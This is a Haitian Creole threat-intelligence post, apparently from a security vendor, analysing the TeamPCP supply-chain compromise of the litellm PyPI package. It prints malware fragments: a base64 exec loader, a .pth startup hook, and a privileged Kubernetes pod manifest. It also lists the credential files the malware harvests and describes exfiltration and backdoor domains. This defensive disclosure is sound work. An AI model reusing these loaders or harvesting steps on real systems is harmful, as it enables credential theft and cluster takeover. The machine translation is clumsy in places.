Poukisa sa a Matters
Nan dat 24 mas 2026, pakè Python popilè a litellm, yon pòtay proxy LLM inivèsèl ke plizyè milye moun itilize enterprises pou dirije trafik ant aplikasyon yo ak founisè IA tankou OpenAI, Anthropic, Google, ak AWS Bedrock, te konpwomèt an silans sou PyPI. De vèsyon anpwazonnen (1.82.7 ak 1.82.8) te pibliye nan yon espas 13 minit youn ak lòt, pote yon chaj milti-etap ki te vòlè kalifikasyon, èkfiltre sekrè nwaj yo, gaye lateralman atravè grap Kubernetes yo, epi enstale yon pòt dèyè pèsistan ak kapasite ekzekisyon kòd a distans.
Avèk apeprè 3.6 milyon telechajman chak jou Ak yon deplwaman pwofon atravè yon enfrastrikti IA natif natal nan nwaj la, litellm chita nan kafou tout sa atakan modèn yo anvi: kle API pou chak gwo founisè IA, kalifikasyon IAM nan nwaj la, sekrè Kubernetes, ak kle SSH.
Men, konpwomi litellm nan pa t yon evènman izole. Li te kilminasyon yon kanpay senk jou, senk ekosistèm pa yon aktè menas ke yo rekonèt kòm EkipPCP, yon kanpay ki te premye anpwazonnen eskanè sekirite yo (Aqua Trivy, Checkmarx KICS), answit itilize done yo te vòlè a CI/CD kalifikasyon yo pou yo kaskad an aval nan npm, OpenVSX, epi finalman PyPI. Atakè yo te itilize zouti òganizasyon yo itilize pou pwoteje chèn ekipman yo kòm zam.
Atak sa a reprezante yon gwo chanjman nan sofistikasyon menas nan chèn ekipman an. Konsepsyon milti-hop, kwa-ekosistèm nan, konpwomèt zouti sekirite pou rive nan gwo valè. Enfrastrikti IA, Sa reflete yon nivo planifikasyon ak matirite operasyonèl ki konsistan avèk zouti atak ki de pli zan pli vin pi komen. Yo te repete chay itil yo an tan reyèl (twa varyant chay itil parèt nan kòd sous la, ki gen ladan vèsyon anvan yo ki te kòmante), yo te anrejistre enfrastrikti C2 a yon jou anvan atak la, epi yo te chwazi domèn èsfiltrasyon yo ak anpil atansyon pou imite enfrastrikti vandè lejitim yo. Sistèm rekòlte kalifikasyon sistematikman konplè a, ki kouvri plis pase 15 kategori ki gen ladan sib espesifik tankou kle siyati Cardano ak konfigirasyon WireGuard, sijere yon degre pwofondè ki montre devlopman malveyan ak asistans entèlijans atifisyèl kòm yon miltiplikatè fòs.
Timeline
| Dat (UTC) | evènman |
|---|---|
| mas 19 | TeamPCP konpwomèt etikèt aksyon Aqua Trivy GitHub yo, ranplase yo ak kòd move ki soti ladan l. CI/CD sekrè ki soti nan depo an aval |
| mas 21 | Konpwomi an pwolonje pou Checkmarx KICS ak AST GitHub Actions lè l sèvi avèk teknik menm jan an. |
| 22 mas, 06:35 | BerriAI pibliye litellm 1.82.6 (dènye vèsyon pwòp) atravè nòmal CI/CD pipeline ki itilize Trivy pou eskanè sekirite |
| mas 23 | TeamPCP anrejistre models.litellm.cloud (domèn èsfiltrasyon). Li konpwomèt plis pase 66 pakè npm ak ekstansyon OpenVSX. |
| 24 mas, 10:39 | litellm 1.82.7 pibliye sou PyPI -- chaj enjekte nan proxy_server.py nan dimansyon modil la. Egzekite lè yo enpòte li. |
| 24 mas, 10:52 | litellm 1.82.8 pibliye 13 minit apre -- ajoute litellm_init.pth, yon konfigirasyon chemen Python ki egzekite sou chak demaraj entèpretè Python, pa sèlman enpòtasyon litellm. Montre iterasyon rapid nan chaj la. |
| 24 mas, ~16:00 PM | PyPI retire tou de vèsyon yo apre rapò kominote a. Vèsyon yo efase nèt (pa retire) nan endèks la, menm si tarball CDN yo rete aksesib. |
Fenèt ekspozisyon: apeprè 5.5 èdtan. Pandan tan sa a, nenpòt pip install litellm, pip install --upgrade litellm, oubyen CI/CD pipeline Si ou te rale dènye vèsyon an, sa ta egzekite chaj la.
Kijan lojisyèl malveyan an te antre: Konpwomi kaskad la
Pake litellm nan pa te sibi yon vyolasyon dirèk. Atakè a te rive jwenn li atravè yon atak chèn ekipman de-sote:
Aqua Trivy GitHub Action (compromised March 19) --> LiteLLM CI/CD pipeline runs Trivy without pinned version --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI LiteLLM yo CI/CD pipeline te itilize Trivy kòm yon eskanè sekirite — zouti ki te fèt pou detekte vilnerabilite yo te li menm vektè atak la. Paske pipeline referansye Trivy pa yon tag chanjab olye de yon tag fikse commit SHA, aksyon konpwomèt la te kouri otomatikman. Aksyon Trivy move a te retire sekrè anviwònman yo, tankou PYPI_PUBLISH jeton, ki bay TeamPCP aksè dirèk pou piblikasyon sou pwojè litellm PyPI a.
Estrateji "konpwomèt gad yo" sa a se yon mak prensipal kanpay TeamPCP a. Lè yo te vize zouti sekirite yo an premye (Trivy, Checkmarx KICS), atakè yo te an menm tan enfim deteksyon an epi yo te jwenn aksè privilejye nan chèn ekipman yo an aval.
Analiz teknik: Chaj itil la
Pwen Enjeksyon
Version 1.82.7 — Ekzekisyon nan nivo modil nan litellm/proxy/proxy_server.py (liy 128):
import subprocess, base64, sys, tempfile, os b64_payload = "<~12KB base64 blob>" with tempfile.TemporaryDirectory() as d: p = os.path.join(d, "p.py") with open(p, "wb") as f: f.write(base64.b64decode(b64_payload)) subprocess.run([sys.executable, p]) Kòd sa a chita nan dimansyon modil la ant yon literal diksyonè ak orijinal la. showwarning() fonksyon. Li egzekite imedyatman lè litellm.proxy.proxy_server yo enpòte — sa rive lè w itilize fonksyonalite proxy litellm nan.
Version 1.82.8 — Te ajoute litellm_init.pth (Fichye konfigirasyon chemen Python):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) Piton .pth dosye nan site-packages/ yo trete nan chak demaraj entèprèt, men sèlman liy ki kòmanse ak import yo egzekite kòm kòd. Atakan an eksplwate sa a lè li mare tout chay la sou yon sèl import deklarasyon: import os, subprocess, sys; subprocess.Popen(...)Sa a pi agresif pase enjeksyon proxy_server.py a — li deklanche menm si litellm pa janm enpòte, chak fwa pwosesis Python lanse. pyproject.toml te modifye pou enkli fichye sa a nan distribisyon an:
include = [ { path = "litellm_init.pth", format = ["sdist", "wheel"] } ] Vèsyon 1.82.8 la konsa genyen de chemen ekzekisyon endepandanEnjeksyon proxy_server.py a (li deklanche lè li enpòte proxy litellm) ak fichye .pth la (li deklanche lè Python demarre). Redondans lan li menm remakab — li pwoteje kont deteksyon oswa sipresyon nenpòt nan chemen yo sèlman. Eskalad la soti nan moman enpòtasyon an rive nan moman demaraj la jis 13 minit apre 1.82.7 sijere ke atakè a t ap siveye siksè deplwaman an epi li t ap repete rapidman.
Etap 1: Rekòlte Konplè Kalifikasyon
Ekriti entèn dekode a se yon vid kalifikasyon metikuleu. Li itilize os.walk(), glob.glob(), subprocess.check_output(), epi lekti dirèk fichye yo pou bale tout sistèm nan:
| kategori | Sib |
|---|---|
| Rekonesans sistèm | hostname, whoami, uname -a, ip addr, printenv, ip route |
| Sch | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, configkle lame ki soti nan /etc/ssh/ |
| Nwaj (AWS) | ~/.aws/credentials, ~/.aws/configKalifikasyon wòl IMDS atravè 169.254.169.254Manadjè Sekrè yo ListSecretsSSM DescribeParameters |
| Nwaj (GCP) | ~/.config/gcloud/ (rekisif); $GOOGLE_APPLICATION_CREDENTIALS |
| Cloud (Azure) | ~/.azure/ (rekisif); varyab anviwònman |
| Kubernetes | Jeton kont sèvis; ca.crtespas non; kubectl get secrets --all-namespacestout sekrè yo atravè API K8s la |
| Dosye anviwònman yo | .env, .env.local, .env.production, .env.development, .env.staging — rechèche rekoursivman (pwofondè 6) atravè /home, /root, /opt, /srv, /var/www, /app, /data, /tmp |
| Koupre | ~/.docker/config.json, /kaniko/.docker/config.json |
| Jeton pake | ~/.npmrc, ~/.vault-token, ~/.netrc |
| baz done | ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Konfigirasyon MongoDB yo |
| TLS / SSL | Kle prive ki soti nan /etc/ssl/private/Ann chifre sètifika yo, tout .pem/.key/.p12/.pfx dosye |
| ale | ~/.git-credentials, ~/.gitconfig |
| CI/CD | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg |
| Crypto bous | Bitcoin, depo kle Ethereum, pè kle Solana (validatè, vòt, patisipasyon, tiyo), kle siyati Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero |
| Istwa Shell | .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history |
| Otorizasyon sistèm | /etc/passwd, /etc/shadow, jounal otorizasyon (sesyon SSH aksepte) |
| Kle Webhook/API yo | Grep pou entènèt Slackhooks, Entènèt Discordhooks, Kle/sekrè API nan dosye konfigirasyon yo |
| VPN | Konfigirasyon WireGuard yo soti nan /etc/wireguard/ |
Dimansyon zouti rekòlte sa a se ansiklopedik. Li vize non sèlman kalifikasyon nwaj yo, men tou bous kriptografik, modpas baz done, konfigirasyon VPN, ak CI/CD sekrè — ki sijere ke atakè a gen entansyon monetize sistèm konpwomèt atravè plizyè vektè.
Etap 2: Eksfiltrasyon chiffres
Done yo vòlè yo chiffres epi èkfiltre lè l sèvi avèk yon sistèm chifreman ibrid:
- AES-256-CBC chifreman tout done kolekte yo ak yon kle sesyon 32-okte o aza (via
openssl enc) - RSA-4096 chifreman kle sesyon an lè l sèvi avèk kle piblik entegre atakè a (OAEP padding, via
openssl pkeyutl) - Tou de fichye chifreman yo gwoupe kòm
tpcp.tar.gz(Atpcpprefiks — "TeamPCP" — parèt toujou pandan tout kanpay la) - HTTPS POST pou
https://models.litellm.cloud/akContent-Type: application/octet-stream
Domèn nan models.litellm.cloud te anrejistre nan dat 23 mas — yon jou anvan atak la — epi li fèt pou melanje ak enfrastrikti litellm lejitim (pwojè reyèl la itilize litellm.aiMenm yon defansè ki okouran de rezo a epi k ap revize trafik sòti a ka pa make trafik la nan sa ki sanble ak pwòp pwen final modèl litellm nan.
Etap 3: Pòt dèyè pèsistan (sysmon.py)
Chaj la enstale yon pòt dèyè pou sondaj ki degize an telemetri sistèm:
- Path:
~/.config/sysmon/sysmon.py - Lapòs:
sysmon.service(inite itilizatè systemd, dekri kòm "Sèvis Telemetri Sistèm") - KonpòtmanApre yon premye dòmi 300 segonn, sondaj yo
https://checkmarx.zone/rawchak ~50 minit - EgzekisyonTelechaje URL C2 a retounen an
/tmp/pglog, mete l kòm ekzekisyonab (chmod 755), egzekite li nan yon sesyon detache - Suivi eta a:
/tmp/.pg_stateanpeche telechaje menm chaj la ankò - Perseverans:
Restart=always,RestartSec=10— siviv aksidan ak rdemaraj
Domèn nan checkmarx.zone se yon typosquat nan Checkmarx (konpayi sekirite a nan checkmarx.com), ki fèt pou analis SOC k ap revize jounal rezo yo ka wè trafik ki ale nan sa ki sanble ak yon vandè sekirite lejitim. Sa a se yon teknik evazyon volontè ki konsistan avèk estrateji jeneral TeamPCP a pou kache dèyè mak vandè sekirite.
Etap 3b: Mouvman Lateral Kubernetes
Si sistèm ki konpwomèt la gen kalifikasyon kont sèvis Kubernetes, malveyan an lis tout nœuds gwoup la epi li deplwaye. gous privilejye pou chak youn:
pod_manifest = { 'apiVersion': 'v1', 'kind': 'Pod', 'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'}, 'spec': { 'nodeName': node_name, 'hostPID': True, 'hostNetwork': True, 'tolerations': [{'operator': 'Exists'}], 'containers': [{ 'name': 'setup', 'image': 'alpine:latest', 'command': ['sh', '-c', drop_cmd], 'securityContext': {'privileged': True}, 'volumeMounts': [{'name': 'host', 'mountPath': '/host'}] }], 'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}], 'restartPolicy': 'Never' } } Chak pod:
- Kouri kòm privilejye ak
hostPID,hostNetwork, ak aksè konplè nan sistèm fichye lame a - Li sèvi ak
chroot /hostpou enstale menm bagay lasysmon.pypòt dèyè sou sistèm fichye rasin lame a - Anrejistre li kòm yon sèvis systemd, pou asire pèsistans lan siviv sipresyon pod la.
- Yo te rele
node-setup-*nankube-systemespas non an pou parèt kòm yon enfrastrikti gwoup lejitim
Sa vle di yon yon sèl konpwomèt CI/CD Yon kourè ki gen aksè K8s ka lakòz chak ne nan gwoup la sibi yon backdoor. — yon senaryo mouvman lateral katastwofik pou òganizasyon k ap itilize litellm kòm yon proksi nan Kubernetes.
Evolisyon Chaj (Varyant ki pa gen kòmantè)
Kòd sous la nan liy 131-132 gen ladan l de varyant chaj ki te deja kòmante, ki revele pwosesis devlopman atakè a:
- Tout twa varyant yo pataje menm enfrastrikti èsfiltrasyon an (
models.litellm.cloud), kle piblik RSA-4096, anbalaj chifreman ibrid AES-256-CBC + RSA, aktpcp.tar.gznonmen pake - Varyant ki pi bonè yo te ajoute yon Kouch chifreman RC4 anndan script koleksyon done a, chifreman done yo rekòlte anvan anbalaj AES+RSA ekstèn lan. Chaj aktif la (liy 130) senplifye lè yo retire kouch RC4 entèn sa a.
- Varyant ki pi bonè yo te itilize
exec()akStringIOkaptire pou egzekite kolektè a pandan pwosesis la, pandan ke chaj aktif la ap itilizesubprocess.run()avèk redireksyon stdout — yon separasyon pi pwòp ki evite polye pwosesis lame a - Tout twa varyant yo vize menm kategori kalifikasyon ak chemen koleksyon yo.
- Kle RC4 la nan varyant anvan yo te yon jouman pwovokan, ki konsistan avèk konpòtman aktè a sou Telegram pou chèche atansyon.
Sa revele yon devlopman aktif pandan operasyon an. Atakè a te senplifye pil chifreman an epi li te amelyore izolasyon ekzekisyon an tout pandan l ap kenbe sib koleksyon yo ak enfrastrikti eksfiltrasyon an stab.
Endikatè Konpwomi (IOC)
Rezo
| Endikatè | Kalite | Objektif |
|---|---|---|
models.litellm.cloud | Domèn | Eksfiltrasyon pwen final (HTTPS POST) |
checkmarx.zone | Domèn | Pwen final sondaj C2 (HTTPS GET /raw) |
Nòt: Lyen rapò ekstèn yo checkmarx.zone/static/checkmarx-util-1.0.4.tgz pou faz KICS ki te pi bonè nan kanpay TeamPCP a. Yo pa t jwenn URL sa a nan payload litellm yo ki te analize isit la.
Hachaj pake
| File | SHA256 |
|---|---|
litellm-1.82.7.tar.gz | 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea |
litellm-1.82.8.tar.gz | d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 |
Sistèm File
| Endikatè | Kalite | Objektif |
|---|---|---|
~/.config/sysmon/sysmon.py | File | Skript pòt dèyè ki pèsistan |
~/.config/systemd/user/sysmon.service | File | Inite pèsistans Systemd |
/tmp/pglog | File | Telechaje binè dezyèm etap la |
/tmp/.pg_state | File | Suivi eta C2 |
litellm_init.pth in site-packages/ | File | Hook demaraj Python (v1.82.8 sèlman) |
tpcp.tar.gz | File | Pake èsfiltrasyon chifre |
Kubernetes
| Endikatè | Kalite | Objektif |
|---|---|---|
node-setup-* gous nan kube-system | Gous | Gous mouvman lateral privilejye |
sysmon.service sou nœuds gwoup yo | Lapòs | Pèsistans nan nivo lame a atravè chape pod |
Kriptografik
| Endikatè | Detay |
|---|---|
| Atakan kle piblik RSA-4096 la | Anprent SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8Entegre nan tout twa varyant chaj itil yo; menm kle a rapòte nan lòt operasyon TeamPCP yo. |
tpcp prefiks nan atifak | Konvansyon pou nonmen pake (tpcp.tar.gz) konsistan pandan tout kanpay la |
Atribisyon: TeamPCP
Yo swiv aktè menas ki dèyè kanpay sa a kòm EkipPCP, ke yo rele tou PCPcat, Persy_PCP, ShellForce, ak DeadCatx3.
Karakteristik li te ye:
- Kenbe chanèl Telegram yo nan
@Persy_PCPta dwe apwouve bèso tibebe w la epi@teampcpkote yo te pase konpayi sekirite yo nan betiz - Opere atravè plizyè ekosistèm (Aksyon GitHub, PyPI, npm, OpenVSX)
- Itilize domèn typosquat espesifik pou chak vandè pou chak faz kanpay la (pa egzanp,
checkmarx.zonepou Checkmarx,models.litellm.cloudpou litellm) - Makè enfrastrikti ki konsistan: menm pè kle RSA a,
tpcp.tar.gzkonvansyon nonmen,tpcp-docs-*Repozitwa GitHub yo itilize kòm etap preparasyon pou moun ki pa gen aksè a yo - Vize zouti sekirite kòm pwen antre nan chenn ekipman pou en aval
Konfyans nan atribisyon: Segondè. Kle piblik RSA pataje a, tpcp Nonmen atifak yo, sipèpoze enfrastrikti C2 a, ak ritm operasyonèl pandan kanpay senk jou a lye fòtman konpwomi Trivy, KICS, npm, OpenVSX, ak litellm yo ak menm aktè a.
MotivasyonPwobableman finansye (vòl bous kriptografik, monetizasyon kalifikasyon nwaj) konbine avèk notoryete (mokè Telegram). Lajè rekòlt kalifikasyon yo — soti nan AWS IAM rive nan pè kle validatè Solana rive nan konfigirasyon WireGuard — sijere yon aktè ki motive finansyèman k ap chèche maksimize ROI nan chak konpwomi.
Asistans posib nan domèn entèlijans atifisyèlSistèm rekòlte kalifikasyon an konplè sistematikman — plis pase 15 kategori ki gen ladan sib espesifik tankou kle siyati Cardano, konfigirasyon WireGuard, ak kalifikasyon Kaniko Docker — nan yon fason ki konsistan avèk enumerasyon ki asisté pa IA. Vitès iterasyon chaj la (twa varyant ak diferan konplo chifreman), kowòdinasyon kwa-ekosistèm (5 ekosistèm nan 5 jou), ak OPSEC operasyonèl (domèn ki imite vandè, chifreman ibrid, pèsistans systemd degize an telemetri) sijere yon nivo debi ki ka reflete devlopman ki asisté pa IA kòm yon miltiplikatè fòs. Evalyasyon sa a se espekilatif; operatè kalifye yo te ka reyalize yon dimansyon menm jan an san zouti IA.
Nouvo TTP ak Teknik
1. Anpwazònman nan Chèn Apwovizyonman Zouti Sekirite (varyant T1195.002)
Konpwomèt eskanè sekirite yo (Trivy, KICS) kòm premye mwayen pou rive nan sib an aval se yon nouvo eskalasyon. Atakan an pa sèlman konpwomèt yon bibliyotèk — li te konpwomèt zouti òganizasyon yo itilize pou... detekte bibliyotèk konpwomèt yo. Sa kreye yon pwen avèg: eskanè ki ta dwe detekte kòd move a se li menm mekanis livrezon an.
2 Python .pth Pèsistans Dosye (T1546)
The litellm_init.pth Teknik nan v1.82.8 la patikilyèman ensidye. Python .pth dosye nan site-packages/ yo trete chak fwa entèprèt la kòmanse; nenpòt liy ki kòmanse ak import egzekite kòm kòd. Lè w mare chaj la sou yon sèl import deklarasyon an, atakè a reyalize ekzekisyon sou chak pwosesis Python — pa sèlman lè litellm enpòte. Sa vle di chaj la deklanche menm si litellm enstale men li pa janm itilize, epi li siviv remèd ki ranplase konpwomèt la. .py dosye san yo pa tcheke pou .pth dosye.
3. Mouvman Lateral Kubernetes nan Tout Klòstè a atravè Deplwaman Pod Privilejye (T1610, T1611)
Kreyasyon otomatik pod privilejye sou chak nœd cluster — avèk hostPID, hostNetwork, montaj sistèm fichye lame a, ak chroot pou enstale pèsistans — chenn deplwaman kontenè (T1610) ak chape nan lame (T1611) pou transfòme yon sèl chaj travay konpwomèt an yon konpwomi konplè nan gwoup la.
4. Enfrastrikti C2 ki pran pòz yon machann
Lè l sèvi avèk models.litellm.cloud (imite litellm) ak checkmarx.zone (imite Checkmarx) kòm pwen final C2/exfil yo fèt pou evite siveyans rezo a. Analis SOC k ap revize trafik sòti a ta wè koneksyon HTTPS ak sa ki sanble ak domèn vandè lejitim.
5. Iterasyon rapid chaj pandan vòl la
Piblikasyon v1.82.7 la avèk ekzekisyon nan moman enpòtasyon an, answit v1.82.8 la avèk ekzekisyon nan moman demaraj la 13 minit apre, montre atakè a ap siveye epi adapte an tan reyèl. Varyant chaj ki gen kòmantè sou yo (avèk diferan konplo chifreman) ki konsève nan kòd sous la konfime devlopman aktif pandan operasyon an.
Ki sa ki ka fè
Atak sa a eksplwate konfyans nan chak kouch: konfyans nan zouti sekirite, konfyans nan rejis pakè, konfyans nan domèn ki sanble familye, konfyans nan CI/CD automatisation. Pou defann kont li, ou bezwen ranfòse chak nan limit konfyans sa yo:
Pou Konsomatè Pakè yo
- Mete depandans yo an plas pa hach, pa sèlman pa vèsyon.
pip install litellm==1.82.6 --hash=sha256:...ta anpeche vèsyon konpwomèt yo te enstale menm si yo te parèt pou yon ti tan kòm dènye vèsyon an. - Sèvi ak dosye lockfile yo.
pip-compile,poetry.lock, epiuv.lockkaptire vèsyon egzak ak hach. CI/CD ta dwe enstale apati de lockfiles, pa apati de espesifikasyon vèsyon k ap flote yo. - Siveye pou
.pthdosye. Fè odit regilyèmansite-packages/pou inatandi.pthfichye — yo egzekite sou chak demaraj Python epi yo se yon mekanis pèsistans ki pa apresye ase. - Aplike kontwòl rezo sòti a. Èksfiltrasyon an pou
models.litellm.cloudak sondaj C2 poucheckmarx.zonefiltraj sòti ki baze sou lis otorizasyon nan anviwònman pwodiksyon yo te ka detekte li.
Pou Moun k ap Antretyen Pakè yo
- Kloure CI/CD aksyon pa commit SHA, pa etikèt. LiteLLM yo pipeline te itilize Trivy san yon vèsyon fikse. Si li te fè referans
aquasecurity/trivy-action@<commit-sha>olye pou yo@latest, aksyon konpwomèt la pa t ap egzekite. - Sèvi ak jeton piblikasyon ki dire yon ti tan, ki gen yon dimansyon limite. PyPI sipòte Editè Konfyans (ki baze sou OIDC) ak jeton API ki gen kad. Eksfiltre a
PYPI_PUBLISHJeton an pa ta dwe gen aksè piblikasyon san restriksyon ki dire lontan. - Aktive otantifikasyon de faktè sou PyPI. Mande 2FA pou tout moun k ap fè antretyen epi sèvi ak kle sekirite pyès ki nan konpitè kote sa posib.
- Siyen pakè yo. Atestasyon Sigstore/PEP 740 yo pèmèt konsomatè yo verifye ke yon pake te konstwi dapre dat yo te espere a. CI/CD pipeline, pa pa yon atakè ak yon jeton yo vòlè.
Pou Operatè Platfòm yo (PyPI, npm, GitHub)
- Detekte modèl piblikasyon anomali. De nouvo vèsyon ki pibliye ak 13 minit diferans, ki soti nan yon adrès IP oswa yon jeton diferan de dabitid, ta dwe deklanche yon pwogram "hold-for-review" oswa yon eskanè otomatik anvan pake a vin enstalab.
- Akselere adopsyon Editè Konfyan yo. Piblikasyon ki baze sou OIDC lye pakè yo ak depo ak workflow espesifik, sa ki fè jeton yo vòlè yo initil deyò orijinal la. CI/CD kontèks.
- Aplike eskanè malveyan nan moman piblikasyon an. Chaj ki dekode base64 nan proxy_server.py a ta ka detekte pa analiz estatik nan moman piblikasyon an.
Pou Ekosistèm nan
- Trete zouti sekirite yo kòm enfrastrikti kritik. Plizyè milyon moun itilize Trivy ak Checkmarx KICS. pipelineAksyon GitHub yo ta dwe siyen, mete anlè, epi kontwole avèk menm rigè ak pakè y ap eskane yo.
- Envesti nan deteksyon pandan ekzekisyon (ruetime). Analiz estatik poukont li pa ka detekte tout teknik obfuskasyon. Siveyans enstalasyon pake a pandan ekzekisyon an hooks, koneksyon rezo inatandi, ak modèl aksè dosye sispèk bay yon defans an pwofondè.
- Pataje enfòmasyon sou menas pi vit. Fenèt ekspozisyon 5.5 èdtan pou litellm nan te ka pi kout si kowòdinasyon ant vandè yo te pi rapid. Sèvis eskanè otomatik tankou Xygeni MEW, Socket, ak Snyk te detekte anomali a — blokaj la se konfimasyon imen ak tan repons rejis la.
konklizyon
Kanpay TeamPCP a se yon moman enpòtan pou software supply chain securityLè yo te konpwomèt eskanè sekirite yo an premye epi sèvi ak yo kòm yon tremplin pou yon enfrastrikti IA ki gen anpil valè, atakè yo te demontre ke chèn ekipman an sèlman solid otan depandans tranzitif ki pi fèb li a, epi depandans sa a ta ka zouti sekirite ou fè konfyans pou kenbe ou an sekirite.
Konpwomi litellm nan mete aksan espesyalman sou risk k ap grandi pou enfrastrikti IA a. Pandan pòtay proxy LLM yo ap vin... standard modèl pou enterprise Nan deplwaman IA a, yo konsantre aksè a kle API, kalifikasyon nwaj, ak done sansib nan yon sèl eleman. Konpwomèt eleman sa a se yon kle skelèt pou tout pil IA a.
Òganizasyon ki te enstale litellm 1.82.7 oubyen 1.82.8 pandan fenèt 5.5 èdtan an ta dwe trete sa kòm yon konpwomi konplè kalifikasyon: chanje tout sekrè yo sou sistèm ki afekte yo, verifye gwoup Kubernetes yo pou node-setup-* gous nan kube-system, retire nenpòt sysmon.service inite systemd yo, epi tcheke pou litellm_init.pth nan Python site-packages/ anyè. Itilizatè imaj ofisyèl Docker la (ghcr.io/berriai/litellm) pa te afekte, paske imaj la te fikse depandans li yo epi li pa te rebati pandan fenèt ekspozisyon an.
Sou otè a
Ko-fondatè & CTO
Luis Rodriguez se Ko-fondatè ak Direktè Teknoloji nan Xygeni Security. Avèk plis pase 20 ane eksperyans nan sekirite aplikasyon, li konsantre sou pwoteksyon AppSec ak kapasite analiz kòd avanse ki ede ekip yo diminye risk reyèl livrezon.




